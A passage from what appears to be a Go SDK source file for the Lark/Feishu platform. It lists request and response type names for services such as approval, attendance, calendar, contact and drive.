    GetApplicationMessageOverviewRespP2pSent, GetApplicationMessageOverviewResp,
    GetApplicationMessageTrendReq, GetApplicationMessageTrendRespGroupReadTimestamp,
    GetApplicationMessageTrendRespGroupRead, GetApplicationMessageTrendRespGroupReceivedTimestamp,
    GetApplicationMessageTrendRespGroupReceived, GetApplicationMessageTrendRespGroupSentTimestamp,
    GetApplicationMessageTrendRespGroupSent, GetApplicationMessageTrendRespP2pReadTimestamp,
    GetApplicationMessageTrendRespP2pRead, GetApplicationMessageTrendRespP2pReceivedTimestamp,
    GetApplicationMessageTrendRespP2pReceived, GetApplicationMessageTrendRespP2pSentTimestamp,
    GetApplicationMessageTrendRespP2pSent, GetApplicationMessageTrendResp,
    GetApplicationOrderReq, GetApplicationOrderRespOrder, GetApplicationOrderResp,
    GetApplicationOrderListReq, GetApplicationOrderListRespOrderList, GetApplicationOrderListResp,
    CheckUserIsInApplicationPaidScopeReq, CheckUserIsInApplicationPaidScopeResp,
    GetApplicationUsageDetailReqFilter, GetApplicationUsageDetailReq,
    GetApplicationUsageDetailRespUser, GetApplicationUsageDetailResp,
    GetApplicationUsageOverviewReq, GetApplicationUsageOverviewRespItem, GetApplicationUsageOverviewResp,
    GetApplicationUsageTrendReqFilter, GetApplicationUsageTrendReq,
    GetApplicationUsageTrendRespItemTrend, GetApplicationUsageTrendRespItem, GetApplicationUsageTrendResp,
    GetApplicationUserAdminScopeReq, GetApplicationUserAdminScopeResp,
    GetApplicationUserVisibleAppReq, GetApplicationUserVisibleAppRespAppList,
    GetApplicationUserVisibleAppResp,
    LarkApprovalService,
    GetApprovalReq, GetApprovalRespViewer, GetApprovalRespNode, GetApprovalResp,
    CreateApprovalCarbonCopyReq, CreateApprovalCarbonCopyResp,
    SearchApprovalCarbonCopyReq, SearchApprovalCarbonCopyRespCcLink, SearchApprovalCarbonCopyRespCc,
    SearchApprovalCarbonCopyRespInstanceLink, SearchApprovalCarbonCopyRespInstance,
    SearchApprovalCarbonCopyRespGroup, SearchApprovalCarbonCopyRespApprovalExternal,
    SearchApprovalCarbonCopyRespApproval, SearchApprovalCarbonCopyResp,
    UploadApprovalFileReq, UploadApprovalFileResp,
    GetApprovalUserTaskListReq, GetApprovalUserTaskListRespCount, GetApprovalUserTaskListRespTaskURLs,
    GetApprovalUserTaskListRespTask, GetApprovalUserTaskListResp,
    AddApprovalInstanceSignReq, AddApprovalInstanceSignResp,
    ApproveApprovalInstanceReq, ApproveApprovalInstanceResp,
    CancelApprovalInstanceReq, CancelApprovalInstanceResp,
    CreateApprovalInstanceReq, CreateApprovalInstanceResp,
    GetApprovalInstanceReq, GetApprovalInstanceRespTimelineExt, GetApprovalInstanceRespTimelineCcUser,
    GetApprovalInstanceRespTimeline, GetApprovalInstanceRespComment, GetApprovalInstanceRespTask,
    GetApprovalInstanceResp, GetApprovalInstanceListReq, GetApprovalInstanceListResp,
    PreviewApprovalInstanceReqForm, PreviewApprovalInstanceReq, PreviewApprovalInstanceResp,
    RejectApprovalInstanceReq, RejectApprovalInstanceResp,
    SearchApprovalInstanceReq, SearchApprovalInstanceRespInstanceInstanceLink,
    SearchApprovalInstanceRespInstanceInstance, SearchApprovalInstanceRespInstanceApprovalGroup,
    SearchApprovalInstanceRespInstanceApprovalExternal, SearchApprovalInstanceRespInstanceApproval,
    SearchApprovalInstanceRespInstance, SearchApprovalInstanceResp,
    TransferApprovalInstanceReq, TransferApprovalInstanceResp,
    UpdateApprovalMessageReq, UpdateApprovalMessageResp,
    SearchApprovalTaskReq, SearchApprovalTaskRespTaskTaskLink, SearchApprovalTaskRespTaskTask,
    SearchApprovalTaskRespTaskInstanceLink, SearchApprovalTaskRespTaskInstance,
    SearchApprovalTaskRespTaskGroup, SearchApprovalTaskRespTaskApprovalExternal,
    SearchApprovalTaskRespTaskApproval, SearchApprovalTaskRespTask, SearchApprovalTaskResp,
    LarkAttendanceService,
    DownloadAttendanceFileReq, DownloadAttendanceFileResp,
    UploadAttendanceFileReq, UploadAttendanceFileRespFile, UploadAttendanceFileResp,
    CreateUpdateAttendanceGroupReqGroupNoNeedPunchSpecialDay,
    CreateUpdateAttendanceGroupReqGroupNeedPunchSpecialDay,
    CreateUpdateAttendanceGroupReqGroupFreePunchCfg, CreateUpdateAttendanceGroupReqGroupLocation,
    CreateUpdateAttendanceGroupReqGroupMachine, CreateUpdateAttendanceGroupReqGroup,
    CreateUpdateAttendanceGroupReq,
    CreateUpdateAttendanceGroupRespGroupNoNeedPunchSpecialDay,
    CreateUpdateAttendanceGroupRespGroupNeedPunchSpecialDay,
    CreateUpdateAttendanceGroupRespGroupFreePunchCfg, CreateUpdateAttendanceGroupRespGroupLocation,
    CreateUpdateAttendanceGroupRespGroupMachine, CreateUpdateAttendanceGroupRespGroup,
    CreateUpdateAttendanceGroupResp,
    DeleteAttendanceGroupReq, DeleteAttendanceGroupResp,
    GetAttendanceGroupReq, GetAttendanceGroupRespGroupIDNoNeedPunchSpecialDay,
    GetAttendanceGroupRespGroupIDNeedPunchSpecialDay, GetAttendanceGroupRespGroupIDFreePunchCfg,
    GetAttendanceGroupRespGroupIDLocation, GetAttendanceGroupRespGroupIDMachine,
    GetAttendanceGroupRespGroupID, GetAttendanceGroupResp,
    InitAttendanceRemedyApprovalReq, InitAttendanceRemedyApprovalRespUserRemedy,
    InitAttendanceRemedyApprovalResp,
    UpdateAttendanceRemedyApprovalReq, UpdateAttendanceRemedyApprovalRespApprovalInfo,
    UpdateAttendanceRemedyApprovalResp,
    CreateAttendanceShiftReqRestTimeRule, CreateAttendanceShiftReqLateOffLateOnRule,
    CreateAttendanceShiftReqPunchTimeRule, CreateAttendanceShiftReq,
    CreateAttendanceShiftRespShiftRestTimeRule, CreateAttendanceShiftRespShiftLateOffLateOnRule,
    CreateAttendanceShiftRespShiftPunchTimeRule, CreateAttendanceShiftRespShift,
    CreateAttendanceShiftResp,
    DeleteAttendanceShiftReq, DeleteAttendanceShiftResp,
    GetAttendanceShiftByIDReq, GetAttendanceShiftByIDRespRestTimeRule,
    GetAttendanceShiftByIDRespLateOffLateOnRule, GetAttendanceShiftByIDRespPunchTimeRule,
    GetAttendanceShiftByIDResp,
    GetAttendanceShiftByNameReq, GetAttendanceShiftByNameRespRestTimeRule,
    GetAttendanceShiftByNameRespLateOffLateOnRule, GetAttendanceShiftByNameRespPunchTimeRule,
    GetAttendanceShiftByNameResp,
    GetAttendanceStatisticsDataReq, GetAttendanceStatisticsDataRespUserDataDataFeature,
    GetAttendanceStatisticsDataRespUserDataData, GetAttendanceStatisticsDataRespUserData,
    GetAttendanceStatisticsDataResp,
    GetAttendanceStatisticsHeaderReq,
    GetAttendanceStatisticsHeaderRespUserStatsFieldFieldChildField,
    GetAttendanceStatisticsHeaderRespUserStatsFieldField, GetAttendanceStatisticsHeaderRespUserStatsField,
    GetAttendanceStatisticsHeaderResp,
    GetAttendanceUserAllowedRemedyReq, GetAttendanceUserAllowedRemedyRespUserAllowedRemedys,
    GetAttendanceUserAllowedRemedyResp,
    CreateAttendanceUserApprovalReqUserApprovalTrip, CreateAttendanceUserApprovalReqUserApprovalOvertimeWork,
    CreateAttendanceUserApprovalReqUserApprovalLeave, CreateAttendanceUserApprovalReqUserApprovalOut,
    CreateAttendanceUserApprovalReqUserApproval, CreateAttendanceUserApprovalReq,
    CreateAttendanceUserApprovalRespUserApprovalTrip,
    CreateAttendanceUserApprovalRespUserApprovalOvertimeWork,
    CreateAttendanceUserApprovalRespUserApprovalLeave, CreateAttendanceUserApprovalRespUserApprovalOut,
    CreateAttendanceUserApprovalRespUserApproval, CreateAttendanceUserApprovalResp,
    GetAttendanceUserApprovalReq, GetAttendanceUserApprovalRespUserApprovalTrip,
    GetAttendanceUserApprovalRespUserApprovalOvertimeWork, GetAttendanceUserApprovalRespUserApprovalLeave,
    GetAttendanceUserApprovalRespUserApprovalOut, GetAttendanceUserApprovalRespUserApproval,
    GetAttendanceUserApprovalResp,
    CreateUpdateAttendanceUserDailyShiftReqUserDailyShift, CreateUpdateAttendanceUserDailyShiftReq,
    CreateUpdateAttendanceUserDailyShiftRespUserDailyShift, CreateUpdateAttendanceUserDailyShiftResp,
    GetAttendanceUserDailyShiftReq, GetAttendanceUserDailyShiftRespUserDailyShift,
    GetAttendanceUserDailyShiftResp,
    BatchCreateAttendanceUserFlowReqFlowRecord, BatchCreateAttendanceUserFlowReq,
    BatchCreateAttendanceUserFlowRespFlowRecord, BatchCreateAttendanceUserFlowResp,
    BatchGetAttendanceUserFlowReq, BatchGetAttendanceUserFlowRespUserFlowResult,
    BatchGetAttendanceUserFlowResp,
    GetAttendanceUserFlowReq, GetAttendanceUserFlowResp,
    QueryAttendanceUserSettingsReq, QueryAttendanceUserSettingsRespUserSetting,
    QueryAttendanceUserSettingsResp,
    UpdateAttendanceUserSettingsReqUserSetting, UpdateAttendanceUserSettingsReq,
    UpdateAttendanceUserSettingsRespUserSetting, UpdateAttendanceUserSettingsResp,
    GetAttendanceUserStatisticsSettingsReq, GetAttendanceUserStatisticsSettingsRespViewItemChildItem,
    GetAttendanceUserStatisticsSettingsRespViewItem, GetAttendanceUserStatisticsSettingsRespView,
    GetAttendanceUserStatisticsSettingsResp,
    UpdateAttendanceUserStatisticsSettingsReqViewItemChildItem,
    UpdateAttendanceUserStatisticsSettingsReqViewItem, UpdateAttendanceUserStatisticsSettingsReqView,
    UpdateAttendanceUserStatisticsSettingsReq,
    UpdateAttendanceUserStatisticsSettingsRespViewItemChildItem,
    UpdateAttendanceUserStatisticsSettingsRespViewItem, UpdateAttendanceUserStatisticsSettingsRespView,
    UpdateAttendanceUserStatisticsSettingsResp,
    GetAttendanceUserTaskReq, GetAttendanceUserTaskRespUserTaskResultRecordCheckOutRecord,
    GetAttendanceUserTaskRespUserTaskResultRecordCheckInRecord,
    GetAttendanceUserTaskRespUserTaskResultRecord, GetAttendanceUserTaskRespUserTaskResult,
    GetAttendanceUserTaskResp,
    GetAttendanceUserTaskRemedyReq, GetAttendanceUserTaskRemedyRespUserRemedy,
    GetAttendanceUserTaskRemedyResp,
    LarkAuthService,
    GetAccessTokenReq, GetAccessTokenResp, RefreshAccessTokenReq, RefreshAccessTokenResp,
    ResendAppTicketReq, ResendAppTicketResp, GetTenantAccessTokenReq, TokenExpire,
    GetUserInfoReq, GetUserInfoResp,
    LarkBitableService,
    CreateBitableFieldReqPropertyOption, CreateBitableFieldReqProperty, CreateBitableFieldReq,
    CreateBitableFieldRespFieldPropertyOption, CreateBitableFieldRespFieldProperty,
    CreateBitableFieldRespField,
    CreateBitableFieldResp,
    DeleteBitableFieldReq, DeleteBitableFieldResp,
    GetBitableFieldListReq, GetBitableFieldListRespItemPropertyOption, GetBitableFieldListRespItemProperty,
    GetBitableFieldListRespItem, GetBitableFieldListResp,
    UpdateBitableFieldReqPropertyOption, UpdateBitableFieldReqProperty, UpdateBitableFieldReq,
    UpdateBitableFieldRespFieldPropertyOption, UpdateBitableFieldRespFieldProperty,
    UpdateBitableFieldRespField, UpdateBitableFieldResp,
    GetBitableMetaReq, GetBitableMetaRespApp, GetBitableMetaResp,
    BatchCreateBitableRecordReqRecord, BatchCreateBitableRecordReq, BatchCreateBitableRecordRespRecord,
    BatchCreateBitableRecordResp,
    BatchDeleteBitableRecordReq, BatchDeleteBitableRecordRespRecord, BatchDeleteBitableRecordResp,
    BatchUpdateBitableRecordReqRecord, BatchUpdateBitableRecordReq, BatchUpdateBitableRecordRespRecord,
    BatchUpdateBitableRecordResp,
    CreateBitableRecordReq, CreateBitableRecordRespRecord, CreateBitableRecordResp,
    DeleteBitableRecordReq, DeleteBitableRecordResp,
    GetBitableRecordReq, GetBitableRecordRespRecord, GetBitableRecordResp,
    GetBitableRecordListReq, GetBitableRecordListRespItem, GetBitableRecordListResp,
    UpdateBitableRecordReq, UpdateBitableRecordRespRecord, UpdateBitableRecordResp,
    BatchCreateBitableTableReqTable, BatchCreateBitableTableReq, BatchCreateBitableTableResp,
    BatchDeleteBitableTableReq, BatchDeleteBitableTableResp,
    CreateBitableTableReqTable, CreateBitableTableReq, CreateBitableTableResp,
    DeleteBitableTableReq, DeleteBitableTableResp,
    GetBitableTableListReq, GetBitableTableListRespItem, GetBitableTableListResp,
    CreateBitableViewReq, CreateBitableViewRespApptableview, CreateBitableViewResp,
    DeleteBitableViewReq, DeleteBitableViewResp,
    GetBitableViewListReq, GetBitableViewListRespItem, GetBitableViewListResp,
    LarkBotService,
    AddBotToChatReq, AddBotToChatResp, GetBotInfoReq, GetBotInfoResp,
    LarkCalendarService,
    CreateCalendarACLReqScope, CreateCalendarACLReq, CreateCalendarACLRespScope, CreateCalendarACLResp,
    DeleteCalendarACLReq, DeleteCalendarACLResp,
    GetCalendarACLListReq, GetCalendarACLListRespACLScope, GetCalendarACLListRespACL,
    GetCalendarACLListResp,
    SubscribeCalendarACLReq, SubscribeCalendarACLResp,
    CreateCalendarReq, CreateCalendarRespCalendar, CreateCalendarResp,
    DeleteCalendarReq, DeleteCalendarResp,
    GetCalendarEventAttendeeChatMemberListReq, GetCalendarEventAttendeeChatMemberListRespItem,
    GetCalendarEventAttendeeChatMemberListResp,
    CreateCalendarEventAttendeeReqAttendee, CreateCalendarEventAttendeeReq,
    CreateCalendarEventAttendeeRespAttendeeChatMember, CreateCalendarEventAttendeeRespAttendee,
    CreateCalendarEventAttendeeResp,
    DeleteCalendarEventAttendeeReq, DeleteCalendarEventAttendeeResp,
    GetCalendarEventAttendeeListReq, GetCalendarEventAttendeeListRespItemChatMember,
    GetCalendarEventAttendeeListRespItem, GetCalendarEventAttendeeListResp,
    CreateCalendarEventReqSchema, CreateCalendarEventReqReminder, CreateCalendarEventReqLocation,
    CreateCalendarEventReqVchat, CreateCalendarEventReqEndTime, CreateCalendarEventReqStartTime,
    CreateCalendarEventReq,
    CreateCalendarEventRespEventSchema, CreateCalendarEventRespEventReminder,
    CreateCalendarEventRespEventLocation, CreateCalendarEventRespEventVchat,
    CreateCalendarEventRespEventEndTime, CreateCalendarEventRespEventStartTime,
    CreateCalendarEventRespEvent, CreateCalendarEventResp,
    DeleteCalendarEventReq, DeleteCalendarEventResp,
    GetCalendarEventReq, GetCalendarEventRespEventSchema, GetCalendarEventRespEventReminder,
    GetCalendarEventRespEventLocation, GetCalendarEventRespEventVchat,
GetCalendarEventRespEventEndTime, GetCalendarEventRespEventStartTime, GetCalendarEventRespEvent, GetCalendarEventResp, GetCalendarEventListReq, GetCalendarEventListRespItemSchema, GetCalendarEventListRespItemReminder, GetCalendarEventListRespItemLocation, GetCalendarEventListRespItemVchat, GetCalendarEventListRespItemEndTime, GetCalendarEventListRespItemStartTime, GetCalendarEventListRespItem, GetCalendarEventListResp, UpdateCalendarEventReqSchema, UpdateCalendarEventReqReminder, UpdateCalendarEventReqLocation, UpdateCalendarEventReqVchat, UpdateCalendarEventReqEndTime, UpdateCalendarEventReqStartTime, UpdateCalendarEventReq, UpdateCalendarEventRespEventSchema, UpdateCalendarEventRespEventReminder, UpdateCalendarEventRespEventLocation, UpdateCalendarEventRespEventVchat, UpdateCalendarEventRespEventEndTime, UpdateCalendarEventRespEventStartTime, UpdateCalendarEventRespEvent, UpdateCalendarEventResp, SearchCalendarEventReqFilterEndTime, SearchCalendarEventReqFilterStartTime, SearchCalendarEventReqFilter, SearchCalendarEventReq, SearchCalendarEventRespItemSchema, SearchCalendarEventRespItemReminder, SearchCalendarEventRespItemLocation, SearchCalendarEventRespItemVchat, SearchCalendarEventRespItemEndTime, SearchCalendarEventRespItemStartTime, SearchCalendarEventRespItem, SearchCalendarEventResp, SubscribeCalendarEventReq, SubscribeCalendarEventResp, GetCalendarFreeBusyListReq, GetCalendarFreeBusyListRespFreebusy, GetCalendarFreeBusyListResp, GetCalendarReq, GetCalendarResp, GetCalendarListReq, GetCalendarListRespCalendar, GetCalendarListResp, UpdateCalendarReq, UpdateCalendarRespCalendar, UpdateCalendarResp, SearchCalendarReq, SearchCalendarRespItem, SearchCalendarResp, SubscribeCalendarReq, SubscribeCalendarRespCalendar, SubscribeCalendarResp, SubscribeCalendarChangeEventReq, SubscribeCalendarChangeEventResp, CreateCalendarTimeoffEventReq, CreateCalendarTimeoffEventResp, DeleteCalendarTimeoffEventReq, DeleteCalendarTimeoffEventResp, UnsubscribeCalendarReq, UnsubscribeCalendarResp, GenerateCaldavConfReq, GenerateCaldavConfResp, LarkChatService, GetChatAnnouncementReq, GetChatAnnouncementResp, UpdateChatAnnouncementReq, UpdateChatAnnouncementResp, CreateChatReq, CreateChatResp, DeleteChatReq, DeleteChatResp, GetChatReq, GetChatResp, GetChatListOfSelfReq, GetChatListOfSelfRespItem, GetChatListOfSelfResp, GetChatOldReq, GetChatOldRespMember, GetChatOldResp, JoinChatReq, JoinChatResp, AddChatMemberReq, AddChatMemberResp, DeleteChatMemberReq, DeleteChatMemberResp, GetChatMemberListReq, GetChatMemberListRespItem, GetChatMemberListResp, IsInChatReq, IsInChatResp, SearchChatReq, SearchChatRespItem, SearchChatResp, UpdateChatReq, UpdateChatResp, LarkContactService, GetContactCustomAttrListReq, GetContactCustomAttrListRespItemI18nName, GetContactCustomAttrListRespItemOptionsOption, GetContactCustomAttrListRespItemOptions, GetContactCustomAttrListRespItem, GetContactCustomAttrListResp, CreateDepartmentReqI18nName, CreateDepartmentReq, CreateDepartmentRespDepartmentStatus, CreateDepartmentRespDepartmentI18nName, CreateDepartmentRespDepartment, CreateDepartmentResp, DeleteDepartmentReq, DeleteDepartmentResp, GetDepartmentReq, GetDepartmentRespDepartmentStatus, GetDepartmentRespDepartmentI18nName, GetDepartmentRespDepartment, GetDepartmentResp, GetDepartmentListReq, GetDepartmentListRespItemStatus, GetDepartmentListRespItemI18nName, GetDepartmentListRespItem, GetDepartmentListResp, GetParentDepartmentReq, GetParentDepartmentRespItemStatus, GetParentDepartmentRespItemI18nName, GetParentDepartmentRespItem, 
GetParentDepartmentResp, SearchDepartmentReq, SearchDepartmentRespItemStatus, SearchDepartmentRespItemI18nName, SearchDepartmentRespItem, SearchDepartmentResp, UpdateDepartmentReqI18nName, UpdateDepartmentReq, UpdateDepartmentRespDepartmentStatus, UpdateDepartmentRespDepartmentI18nName, UpdateDepartmentRespDepartment, UpdateDepartmentResp, UpdateDepartmentPatchReqI18nName, UpdateDepartmentPatchReq, UpdateDepartmentPatchRespDepartmentStatus, UpdateDepartmentPatchRespDepartmentI18nName, UpdateDepartmentPatchRespDepartment, UpdateDepartmentPatchResp, CreateEmployeeTypeEnumReqI18nContent, CreateEmployeeTypeEnumReq, CreateEmployeeTypeEnumRespEmployeeTypeEnumI18nContent, CreateEmployeeTypeEnumRespEmployeeTypeEnum, CreateEmployeeTypeEnumResp, DeleteEmployeeTypeEnumReq, DeleteEmployeeTypeEnumResp, GetEmployeeTypeEnumListReq, GetEmployeeTypeEnumListRespItemI18nContent, GetEmployeeTypeEnumListRespItem, GetEmployeeTypeEnumListResp, UpdateEmployeeTypeEnumPatchReqI18nContent, UpdateEmployeeTypeEnumPatchReq, UpdateEmployeeTypeEnumPatchRespEmployeeTypeEnumI18nContent, UpdateEmployeeTypeEnumPatchRespEmployeeTypeEnum, UpdateEmployeeTypeEnumPatchResp, DeleteContactGroupReq, DeleteContactGroupResp, GetContactGroupReq, GetContactGroupRespGroup, GetContactGroupResp, CreateContactGroupReq, CreateContactGroupResp, GetContactGroupListReq, GetContactGroupListRespGroup, GetContactGroupListResp, AddContactGroupMemberReq, AddContactGroupMemberResp, DeleteContactGroupMemberReq, DeleteContactGroupMemberResp, GetContactGroupMemberReq, GetContactGroupMemberRespMember, GetContactGroupMemberResp, UpdateContactGroupReq, UpdateContactGroupResp, BindContactUnitDepartmentReq, BindContactUnitDepartmentResp, CreateContactUnitReq, CreateContactUnitResp, DeleteContactUnitReq, DeleteContactUnitResp, GetContactUnitReq, GetContactUnitRespUnit, GetContactUnitResp, GetContactUnitListReq, GetContactUnitListRespUnit, GetContactUnitListResp, GetContactUnitDepartmentListReq, GetContactUnitDepartmentListRespDepartment, GetContactUnitDepartmentListResp, UnbindContactUnitDepartmentReq, UnbindContactUnitDepartmentResp, UpdateContactUnitReq, UpdateContactUnitResp, CreateUserReqNotificationOption, CreateUserReqCustomAttrValueGenericUser, CreateUserReqCustomAttrValue, CreateUserReqCustomAttr, CreateUserReqOrder, CreateUserReq, CreateUserRespUserNotificationOption, CreateUserRespUserCustomAttrValueGenericUser, CreateUserRespUserCustomAttrValue, CreateUserRespUserCustomAttr, CreateUserRespUserOrder, CreateUserRespUserStatus, CreateUserRespUserAvatar, CreateUserRespUser, CreateUserResp, DeleteUserReq, DeleteUserResp, GetUserReq, GetUserRespUserCustomAttrValueGenericUser, GetUserRespUserCustomAttrValue, GetUserRespUserCustomAttr, GetUserRespUserOrder, GetUserRespUserStatus, GetUserRespUserAvatar, GetUserRespUser, GetUserResp, BatchGetUserReq, BatchGetUserRespUserInfo, BatchGetUserResp, BatchGetUserByIDReq, BatchGetUserByIDRespEmailUser, BatchGetUserByIDRespEmailUser, BatchGetUserByIDResp, GetUserListReq, GetUserListRespItemCustomAttrValueGenericUser, GetUserListRespItemCustomAttrValue, GetUserListRespItemCustomAttr, GetUserListRespItemOrder, GetUserListRespItemStatus, GetUserListRespItemAvatar, GetUserListRespItem, GetUserListResp, SearchUserOldReq, SearchUserOldRespUserAvatar, SearchUserOldRespUser, SearchUserOldResp, UpdateUserReqCustomAttrValueGenericUser, UpdateUserReqCustomAttrValue, UpdateUserReqCustomAttr, UpdateUserReqOrder, UpdateUserReq, UpdateUserRespUserNotificationOption, UpdateUserRespUserCustomAttrValueGenericUser, 
UpdateUserRespUserCustomAttrValue, UpdateUserRespUserCustomAttr, UpdateUserRespUserOrder, UpdateUserRespUserStatus, UpdateUserRespUserAvatar, UpdateUserRespUser, UpdateUserResp, UpdateUserPatchReqCustomAttrValueGenericUser, UpdateUserPatchReqCustomAttrValue, UpdateUserPatchReqCustomAttr, UpdateUserPatchReqOrder, UpdateUserPatchReq, UpdateUserPatchRespUserNotificationOption, UpdateUserPatchRespUserCustomAttrValueGenericUser, UpdateUserPatchRespUserCustomAttrValue, UpdateUserPatchRespUserCustomAttr, UpdateUserPatchRespUserOrder, UpdateUserPatchRespUserStatus, UpdateUserPatchRespUserAvatar, UpdateUserPatchRespUser, UpdateUserPatchResp, LarkDriveService, CreateDriveCommentReqReplyListReplyContentElementPerson, CreateDriveCommentReqReplyListReplyContentElementDocsLink, CreateDriveCommentReqReplyListReplyContentElementTextRun, CreateDriveCommentReqReplyListReplyContentElement, CreateDriveCommentReqReplyListReplyContent, CreateDriveCommentReqReplyListReply, CreateDriveCommentReqReplyList, CreateDriveCommentReq, CreateDriveCommentRespReplyListReplyContentElementPerson, CreateDriveCommentRespReplyListReplyContentElementDocsLink, CreateDriveCommentRespReplyListReplyContentElementTextRun, CreateDriveCommentRespReplyListReplyContentElement, CreateDriveCommentRespReplyListReplyContent, CreateDriveCommentRespReplyListReply, CreateDriveCommentRespReplyList, CreateDriveCommentResp, DeleteDriveCommentReq, DeleteDriveCommentResp, GetDriveCommentReq, GetDriveCommentRespReplyListReplyContentElementPerson, GetDriveCommentRespReplyListReplyContentElementDocsLink, GetDriveCommentRespReplyListReplyContentElementTextRun, GetDriveCommentRespReplyListReplyContentElement, GetDriveCommentRespReplyListReplyContent, GetDriveCommentRespReplyListReply, GetDriveCommentRespReplyList, GetDriveCommentResp, GetDriveCommentListReq, GetDriveCommentListRespItemReplyListReplyContentElementPerson, GetDriveCommentListRespItemReplyListReplyContentElementDocsLink, GetDriveCommentListRespItemReplyListReplyContentElementTextRun, GetDriveCommentListRespItemReplyListReplyContentElement, GetDriveCommentListRespItemReplyListReplyContent, GetDriveCommentListRespItemReplyListReply, GetDriveCommentListRespItemReplyList, GetDriveCommentListRespItem, GetDriveCommentListResp, UpdateDriveCommentPatchReq, UpdateDriveCommentPatchResp, UpdateDriveCommentReqContentElementPerson, UpdateDriveCommentReqContentElementDocsLink, UpdateDriveCommentReqContentElementTextRun, UpdateDriveCommentReqContentElement, UpdateDriveCommentReqContent, UpdateDriveCommentReq, UpdateDriveCommentResp, GetDriveDocContentReq, GetDriveDocContentResp, CreateDriveDocReq, CreateDriveDocResp, GetDriveDocMetaReq, GetDriveDocMetaResp, GetDriveDocRawContentReq, GetDriveDocRawContentResp, CopyDriveFileReq, CopyDriveFileResp, CreateDriveFileReq, CreateDriveFileResp, DeleteDriveFileReq, DeleteDriveFileResp, DownloadDriveFileReq, DownloadDriveFileResp, DownloadDriveFileResp, GetDriveFileMetaReqRequestDocs, GetDriveFileMetaReq, GetDriveFileMetaRespDocsMetas, GetDriveFileMetaResp, SearchDriveFileReq, SearchDriveFileRespDocsEntity, SearchDriveFileResp, DeleteDriveSheetFileReq, DeleteDriveSheetFileResp, GetDriveFileStatisticsReq, GetDriveFileStatisticsRespStatistics, GetDriveFileStatisticsResp, UploadDriveFileReq, UploadDriveFileResp, FinishUploadDriveFileReq, FinishUploadDriveFileResp, PartUploadDriveFileReq, PartUploadDriveFileResp, PrepareUploadDriveFileReq, PrepareUploadDriveFileResp, GetDriveFolderChildrenReq, GetDriveFolderChildrenRespChildren, GetDriveFolderChildrenResp, 
CreateDriveFolderReq, CreateDriveFolderResp, GetDriveFolderMetaReq, GetDriveFolderMetaResp, GetDriveRootFolderMetaReq, GetDriveRootFolderMetaResp, CreateDriveImportTaskReqPoint, CreateDriveImportTaskReq, CreateDriveImportTaskResp, GetDriveImportTaskReq, GetDriveImportTaskRespResult, GetDriveImportTaskResp, BatchGetDriveMediaTmpDownloadURLReq, BatchGetDriveMediaTmpDownloadURLRespTmpDownloadURL, BatchGetDriveMediaTmpDownloadURLResp, DownloadDriveMediaReq, DownloadDriveMediaResp, DownloadDriveMediaResp, UploadDriveMediaReq, UploadDriveMediaResp, FinishUploadDriveMediaReq, FinishUploadDriveMediaResp, PartUploadDriveMediaReq, PartUploadDriveMediaResp, PrepareUploadDriveMediaReq, PrepareUploadDriveMediaResp, CheckDriveMemberPermissionReq, CheckDriveMemberPermissionResp, CreateDriveMemberPermissionReq, CreateDriveMemberPermissionRespMember, CreateDriveMemberPermissionResp, CreateDriveMemberPermissionOldReqMembers, CreateDriveMemberPermissionOldReq, CreateDriveMemberPermissionOldRespFailMembers, CreateDriveMemberPermissionOldResp, DeleteDriveMemberPermissionReq, DeleteDriveMemberPermissionResp, DeleteDriveMemberPermissionOldReq, DeleteDriveMemberPermissionOldResp, GetDriveMemberPermissionListReq, GetDriveMemberPermissionListRespMember, GetDriveMemberPermissionListResp, TransferDriveMemberPermissionReqOwner, TransferDriveMemberPermissionReq, TransferDriveMemberPermissionRespOwner, TransferDriveMemberPermissionResp, UpdateDriveMemberPermissionReq, UpdateDriveMemberPermissionRespMember, UpdateDriveMemberPermissionResp, UpdateDriveMemberPermissionOldReq, UpdateDriveMemberPermissionOldResp, GetDrivePublicPermissionV2Req, GetDrivePublicPermissionV2Resp, UpdateDrivePublicPermissionReq, UpdateDrivePublicPermissionRespPermissionPublic, UpdateDrivePublicPermissionResp, UpdateDrivePublicPermissionV1OldReq, UpdateDrivePublicPermissionV1OldResp, UpdateDrivePublicPermissionV2OldReq, UpdateDrivePublicPermissionV2OldResp, BatchUpdateSheetReqRequestDeleteSheet, BatchUpdateSheetReqRequestCopySheetDestination, BatchUpdateSheetReqRequestCopySheetSource, BatchUpdateSheetReqRequestCopySheet, BatchUpdateSheetReqRequestAddSheetProperties, BatchUpdateSheetReqRequestAddSheet, BatchUpdateSheetReqRequestUpdateSheetPropertiesProtect, BatchUpdateSheetReqRequestUpdateSheetProperties, BatchUpdateSheetReqRequestUpdateSheet, BatchUpdateSheetReqRequest, BatchUpdateSheetReq, BatchUpdateSheetRespReplyDeleteSheet, BatchUpdateSheetRespReplyUpdateSheetPropertiesProtect, BatchUpdateSheetRespReplyUpdateSheetProperties, BatchUpdateSheetRespReplyUpdateSheet, BatchUpdateSheetRespReplyCopySheetProperties, BatchUpdateSheetRespReplyCopySheet, BatchUpdateSheetRespReplyAddSheetProperties, BatchUpdateSheetRespReplyAddSheet, BatchUpdateSheetRespReply, BatchUpdateSheetResp, MergeSheetCellReq, MergeSheetCellResp, UnmergeSheetCellReq, UnmergeSheetCellResp, CreateSheetConditionFormatReqSheetConditionFormatConditionFormatStyleFont, CreateSheetConditionFormatReqSheetConditionFormatConditionFormatStyle, CreateSheetConditionFormatReqSheetConditionFormatConditionFormatAttr, CreateSheetConditionFormatReqSheetConditionFormatConditionFormat, CreateSheetConditionFormatReqSheetConditionFormat, CreateSheetConditionFormatReq, CreateSheetConditionFormatRespResponse, CreateSheetConditionFormatResp, DeleteSheetConditionFormatReqSheetCfIDs, DeleteSheetConditionFormatReq, DeleteSheetConditionFormatRespResponse, DeleteSheetConditionFormatResp, GetSheetConditionFormatReq, GetSheetConditionFormatRespSheetConditionFormatConditionFormatStyleFont, 
